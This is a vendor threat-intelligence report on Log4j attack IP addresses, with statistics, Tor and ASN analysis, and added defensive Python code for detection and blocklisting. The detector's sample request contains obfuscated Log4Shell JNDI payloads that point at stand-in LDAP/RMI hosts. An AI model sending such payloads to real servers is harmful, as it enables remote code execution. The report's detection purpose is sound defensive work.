‘Criminal IP’, a cyber threat intelligence platform of AI Spera

AI Spera, a cyber threat intelligence company, has released detection and analysis data on 8,900 attack logs targeting the Log4j (Log4Shell) vulnerability (CVE-2021-44228), collected through its own threat intelligence platform 'Criminal IP'.

Since security teams at home and abroad have not yet fully remediated the Log4j vulnerability, the database of IP addresses that attempted attacks, used alongside the official patches, should help corporate, institutional, and national defenders. The disclosed data includes per-country statistics, ASN statistics, an analysis of the attack logs, and the threat ratings of the IP addresses that attempted the attacks, so that addresses observed exploiting Log4j can be blocked pre-emptively.

AI Spera updates the attack IP address data collected by Criminal IP daily and provides it free of charge to security personnel still dealing with the Log4j issue. If you contact , we will deliver the latest attack IP address data so that institutions and companies have the information they need to respond to Log4j attacks.

The following is an analysis of data collected in AI Spera's IP intelligence system, Criminal IP, on IP addresses involved in Log4j attacks on five days in December 2021 (the 14th, 18th, 20th, 21st, and 22nd).

■ Log4j Vulnerability Attack Statistics

As the table below shows, the number of attack logs rose by a factor of about 2.45, from 963 on the 14th to 2,357 on the 18th, which points to attack tooling spreading and to more scanning for potential targets. When duplicates are removed and only unique IP addresses are counted, however, the number fell by almost a factor of four, from 245 on the 14th to 65 on the 18th, and averaged around 50-60 unique addresses per day thereafter: fewer sources were sending far more requests each.

A total of 381 unique IP addresses were detected, of which 107 attacked repeatedly across the observation days. These recurring addresses are most plausibly servers running automated attack scripts. Companies running Log4j-based services are therefore strongly advised to block these addresses in advance.

Log4j Vulnerability Attack Log Statistics collected through Criminal IP

■ Country statistics

The 381 addresses were spread across 39 countries. The top three were the United States, Germany, and China, and the top five countries together accounted for 84% of the addresses. China, a frequent source of IP addresses rated dangerous, was among them, as was the United States, from which much attack scanning commonly originates.

Log4j Vulnerability Attack Log Statistics collected through Criminal IP

■ Tor IP

Some of the attack IP addresses were Tor exit nodes. Tor is best known as a browser and for its association with the dark web, but it is also a SOCKS proxy that scanners written in Python, C#, Go, and other languages can route their traffic through, and attackers commonly do so to hide their origin while scanning and exploiting targets. Since Tor exit addresses are frequently used for malicious activity, it is recommended to block inbound connections from Tor exit nodes proactively. Note that this also blocks legitimate Tor users, so the decision should be weighed against the service's audience.

Log4j Vulnerability Attack Log Statistics collected through Criminal IP

■ Hackers are not the only ones attacking

The following statistics list the ASN Name and Org Name, i.e. the owners of the IP addresses. Looking at the ASN Names in the United States, which has the most attack IP addresses, most belong to hosting or ISP companies whose cloud servers or hosting services are rented to run scans and attacks. DigitalOcean servers stand out in particular: whereas attacks launched from cloud servers such as AWS used to be frequent, they have declined significantly in recent years and other hosting providers have taken their place.

In addition to hosting companies, there were attacks originating from the Massachusetts Institute of Technology (MIT). These could have been students in dormitories acting out of curiosity, or laboratory research. The ASN Name and Org Name of the attacking addresses make the latter more plausible: the Org Name tied two IP addresses to the Computer Science and Artificial Intelligence Laboratory (CSAIL) and to MIT's Vice President for Information Systems and Technology, Mark Silis. An IP address belonging to a security testing company called ESecurity was also identified. Not every attacking IP address can therefore be attributed to a malicious hacker; scanning activity is also observed from various cybersecurity research institutions.

Classification based on AS Name and Org Name of Log4j Attack IP Addresses

■ Diversification of attack packets

Close examination of the attack packets revealed a variety of patterns. The initial attack style places the JNDI lookup string directly in the User-Agent header, which is a simple, single-vector scan. Because it is so simple, patterns and signatures to detect it were distributed quickly and it can be blocked immediately. As a result, more and more attackers are switching to alternative encodings that evade these known detection techniques.

The structure of the packet commonly used in these bypass methods is shown below. It is a useful starting point for writing IDS/IPS signatures.
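To make the evasion concrete, the following added example (written for this page, not Criminal IP code) normalises the widely documented Log4Shell obfuscation tricks so that one signature catches both the plain `${jndi:...}` lookup and its evasive forms: nested `${lower:x}`/`${upper:x}` lookups, the `${...:-x}` default-value trick (e.g. `${::-j}`, `${env:NOPE:-j}`), and URL-encoding in the request line. The sample request, header names and IP addresses are constructed for the demonstration.

```python
"""Added example: detect Log4Shell (CVE-2021-44228) JNDI lookups in an HTTP
request, including obfuscated variants. Not Criminal IP's own code."""
import re
from typing import Optional
from urllib.parse import unquote

# ${lower:x} / ${upper:x} collapse to x; the result is case-folded at the end,
# so the direction of the case change does not matter for matching.
_CASE_LOOKUP = re.compile(r"\$\{\s*(?:lower|upper)\s*:([^{}]*)\}", re.IGNORECASE)
# Default-value trick: ${<lookup>:-x} evaluates to x when the lookup is empty,
# e.g. ${::-j}, ${env:NOPE:-n}, ${sys:nope:-d}.
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# After normalisation every variant reads ${jndi:<scheme>://<target>...}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/\s}]+)", re.IGNORECASE)


def normalize_lookup(value: str) -> str:
    """Undo URL-encoding, then collapse nested case/default lookups from the
    innermost outwards until the string stops changing (each pass shortens it)."""
    text = unquote(value)
    while True:
        folded = _CASE_LOOKUP.sub(r"\1", text)
        folded = _DEFAULT_LOOKUP.sub(r"\1", folded)
        if folded == text:
            return text.lower()
        text = folded


def find_jndi(value: str) -> Optional[dict]:
    """Return scheme, target and the normalised string for a JNDI lookup hidden
    in `value`, or None when there is none."""
    normalized = normalize_lookup(value)
    m = _JNDI.search(normalized)
    if not m:
        return None
    return {"scheme": m.group(1), "target": m.group(2), "normalized": normalized}


def scan_request(raw_request: str) -> dict:
    """Map 'request-line' or header name -> finding for every part of the
    request that carries a JNDI lookup."""
    findings = {}
    request_line, *header_lines = raw_request.split("\r\n")
    hit = find_jndi(request_line)
    if hit:
        findings["request-line"] = hit
    for line in header_lines:
        if not line:  # blank line ends the header block
            break
        name, _, value = line.partition(":")
        hit = find_jndi(value.strip())
        if hit:
            findings[name.strip()] = hit
    return findings


# Constructed sample: URL-encoded lookup in the query string, a mixed
# lower/upper/default obfuscation in User-Agent, and an all-default-trick
# variant (scheme included) in X-Api-Version. Addresses are documentation ranges.
SAMPLE_REQUEST = (
    "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fa%7D HTTP/1.1\r\n"
    "Host: victim.example\r\n"
    "User-Agent: ${${lower:j}${upper:n}${::-d}${env:NOPE:-i}:ldap://203.0.113.10:1389/Exploit}\r\n"
    "X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://203.0.113.11:1099/a}\r\n"
    "Accept: */*\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for where, hit in scan_request(SAMPLE_REQUEST).items():
        print(f"{where}: {hit['scheme']} -> {hit['target']}  ({hit['normalized']})")
```

The point of the loop in `normalize_lookup` is that a signature written against the normalised form does not need a new regex for every fresh combination of `${lower:}`, `${upper:}` and `${::-x}`; a detector matching raw bytes would need one per variant. An IDS cannot normalise like this on the wire at line rate, which is one reason the report falls back to blocking source addresses.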

■ Confirmation in IP Intelligence

Finally, Criminal IP assigns every IP address worldwide one of five threat levels (Safe, Low, Moderate, Dangerous, Critical). Of the IP addresses collected from the Log4j attacks, 87.1% were rated Dangerous or Critical, meaning they already had a history of targeting other organizations or are persistently used for malicious activity. Feeding dangerous-IP information from the Criminal IP intelligence system into inbound blocking therefore lets organizations cut off most Log4j attack sources before they reach a vulnerable service.

Classification of Log4j attack IP addresses based on 5-step threat ratings by Criminal IP

“If you proactively obtain and block the attack IP address, you can mitigate the scanning attack by hackers.”

As Log4j attacks draw more public attention, both the attackers and their methods are becoming more diverse. In particular, attackers are crafting new packet variants to evade IDS/IPS signatures. Obtaining and blocking the attack IP addresses in advance therefore mitigates the scanning regardless of how the payload is encoded. Since Tor exit addresses are also used to obscure the origin of attacks, blocking Tor exits helps as well.

Integrating IP address blocking with an IP intelligence system also removes the need to collect new IP addresses by hand and allows an automatic response whenever an attacker moves to a new address and resumes scanning. IDS/IPS signatures were initially the answer to constantly changing source addresses, but with the attack packets themselves changing so frequently, defenders have shifted back to the traditional method of blocking IP addresses, with the intelligence system supplying in advance the candidate addresses that are likely to attack.

In other cases, the ASN Name or Org Name alone shows that the traffic is security testing or a security check. Blocking such addresses may not be necessary. If there is a concern that even a simulated attack could compromise internal assets, an alternative is to contact the scanning organization and ask for the company's address range to be removed from its scans.
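The report's recommendations, recurring addresses and Tor exits blocked (the attack statistics and Tor sections above), Dangerous/Critical ratings blocked (the IP intelligence section), and research scanners identified by Org Name set aside for contact rather than blocked (the paragraph above), can be expressed as one small policy over the feed. The following added example (written for this page; not Criminal IP's code or feed format) does that over a constructed CSV whose columns mirror the fields the report discusses. The feed, the organization names, and the nftables table and chain names in the emitted rule are all assumptions.

```python
"""Added example: derive a blocklist from a Log4j attack-IP feed using the
policy described in the report. Feed format and contents are constructed."""
import csv
from collections import defaultdict
from io import StringIO

# Constructed feed: one row per attack log, as the report's table counts them.
FEED = """\
date,ip,country,org,rating,tor_exit
2021-12-14,203.0.113.10,US,ExampleCloud Hosting,Critical,no
2021-12-14,203.0.113.11,DE,ExampleCloud Hosting,Dangerous,no
2021-12-14,198.51.100.7,US,Example University CSAIL,Low,no
2021-12-14,192.0.2.44,CN,Example ISP,Moderate,no
2021-12-14,192.0.2.99,NL,Example Relay Org,Dangerous,yes
2021-12-18,203.0.113.10,US,ExampleCloud Hosting,Critical,no
2021-12-18,203.0.113.10,US,ExampleCloud Hosting,Critical,no
2021-12-18,198.51.100.7,US,Example University CSAIL,Low,no
2021-12-18,192.0.2.45,CN,Example ISP,Safe,no
2021-12-20,203.0.113.11,DE,ExampleCloud Hosting,Dangerous,no
2021-12-20,192.0.2.44,CN,Example ISP,Moderate,no
"""

RESEARCH_ORGS = {"Example University CSAIL"}   # constructed allowlist by Org Name
BLOCK_RATINGS = {"Dangerous", "Critical"}      # the report's top two of five levels


def load_feed(text):
    """Parse the CSV feed into a list of row dicts."""
    return list(csv.DictReader(StringIO(text)))


def daily_stats(records):
    """date -> (attack log count, unique source IPs), the report's two columns."""
    logs, ips = defaultdict(int), defaultdict(set)
    for r in records:
        logs[r["date"]] += 1
        ips[r["date"]].add(r["ip"])
    return {d: (logs[d], len(ips[d])) for d in sorted(logs)}


def recurring_ips(records, min_days=2):
    """IPs seen on at least `min_days` distinct days: likely automated scanners."""
    days = defaultdict(set)
    for r in records:
        days[r["ip"]].add(r["date"])
    return {ip for ip, seen in days.items() if len(seen) >= min_days}


def build_blocklist(records, research_orgs=RESEARCH_ORGS, min_days=2):
    """Return (block, contact): addresses to drop at the edge, and research
    scanners to contact for removal instead of blocking."""
    recurring = recurring_ips(records, min_days)
    block, contact = set(), set()
    for r in records:
        risky = (r["ip"] in recurring
                 or r["tor_exit"] == "yes"
                 or r["rating"] in BLOCK_RATINGS)
        if not risky:
            continue
        (contact if r["org"] in research_orgs else block).add(r["ip"])
    return sorted(block), sorted(contact)


def nft_rule(block, table="inet filter", chain="input"):
    """One nftables rule with an anonymous set; table/chain names are assumed."""
    return f"add rule {table} {chain} ip saddr {{ {', '.join(block)} }} drop"


if __name__ == "__main__":
    rows = load_feed(FEED)
    for day, (n_logs, n_ips) in daily_stats(rows).items():
        print(f"{day}: {n_logs} logs, {n_ips} unique IPs")
    block, contact = build_blocklist(rows)
    print("contact instead of block:", contact)
    print(nft_rule(block))
```

The allowlist is keyed on Org Name only because that is the field the report uses to recognise research scanners; a production version should require the feed source itself to vouch for the organization, since an attacker operating from a compromised university host would otherwise inherit the exemption (the risk the next paragraph describes).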

Conversely, if the IP intelligence system finds an ASN Name or Org Name sending attack packets from an organization that has nothing to do with cybersecurity, such as a manufacturing company or a medical facility, rather than from a cloud or hosting provider, the scanning is very likely not research but an attacker operating from a server they have already compromised. National investigative and law enforcement agencies would do well to monitor such cases regularly, since they point to intrusions that might otherwise go unnoticed.

This report is based on data from Criminal IP, a cyber threat intelligence search engine. Create a free Criminal IP account to access the search results cited in the report and to search for more extensive threat intelligence. [Criminal IP's Official Service Release]